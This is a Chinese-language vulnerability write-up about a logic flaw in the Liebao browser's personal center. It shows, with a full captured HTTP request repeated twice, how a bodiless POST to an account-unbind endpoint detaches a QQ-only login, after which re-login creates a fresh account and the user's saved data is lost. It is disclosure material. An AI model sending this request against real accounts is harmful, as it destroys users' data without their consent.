猎豹浏览器个人中心逻辑错误导致重置用户数据

ld.png-26.7kB

这个漏洞只能是只绑定了QQ的，就是只用QQ登陆的用户

1、打开Url：http://i.liebao.cn/，首先来确认下这个是保存了数据的，如图

image_1cjpp6pisqiihlv1fah1m5h1v4gp.png-144.5kB

image_1cjpp7uibcgr1t881jd515t1ru916.png-121.5kB

可以看到这些都是存在的，那么来看我是如何来重置的~

image_1cjppa3u017p4ucr56g1smk16pv1j.png-151.3kB

点击上图的已关联

image_1cjppar4n1idj1s6qk98lv1no220.png-126.2kB

2、点击取消关联并且抓包

这里要抓对包来~那么我抓到的包在下面：

POST /account/qqunbin HTTP/1.1
Host: i.ijinshan.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://i.ijinshan.com/liebao/unbind_qq?act=unqq_f&pp=kswl714700207&sid=25664df22557c34fc31e781ab2414336
Content-Length: 0
Content-Type: text/plain;charset=UTF-8
Cookie: PHPSESSID=dnndrfci414m8bc7cpu2o56b24
Connection: close

也就是Url：

1	i.ijinshan.com/account/qqunbin

直接访问上图的Url会取消绑定QQ，如下

image_1cjpph1q51hecjt91rbm1a8bb3s2d.png-90.5kB

注意：这里解绑后重新登陆才可以（感觉是个bug，解绑了不是立马显示出来还要重新登陆）

3、重新登陆

用刚刚被解绑的qq账号重新登陆一下，会来到这个页面

image_1cjpppv0fuhe134v1vf1qb15ia2q.png-250.9kB

然后点击自动创建（因为这个账号没了，所以可以自动创建）

4、登陆后查看效果

image_1cjppvns4vt5lj81uhr1cddbe6a.png-141.7kB

image_1cjpq0rj51ekf1ccj1u7apuj1mci6n.png-112.5kB

ok，没了

1	POST /account/qqunbin HTTP/1.1
2	Host: i.ijinshan.com
3	User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4	Accept: /
5	Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
6	Accept-Encoding: gzip, deflate
7	DNT: 1
8	X-Requested-With: XMLHttpRequest
9	Referer: http://i.ijinshan.com/liebao/unbind_qq?act=unqq_f&pp=kswl714700207&sid=25664df22557c34fc31e781ab2414336
10	Content-Length: 0
11	Content-Type: text/plain;charset=UTF-8
12	Cookie: PHPSESSID=dnndrfci414m8bc7cpu2o56b24
13	Connection: close

猎豹浏览器个人中心逻辑错误导致重置用户数据

禁止打赏~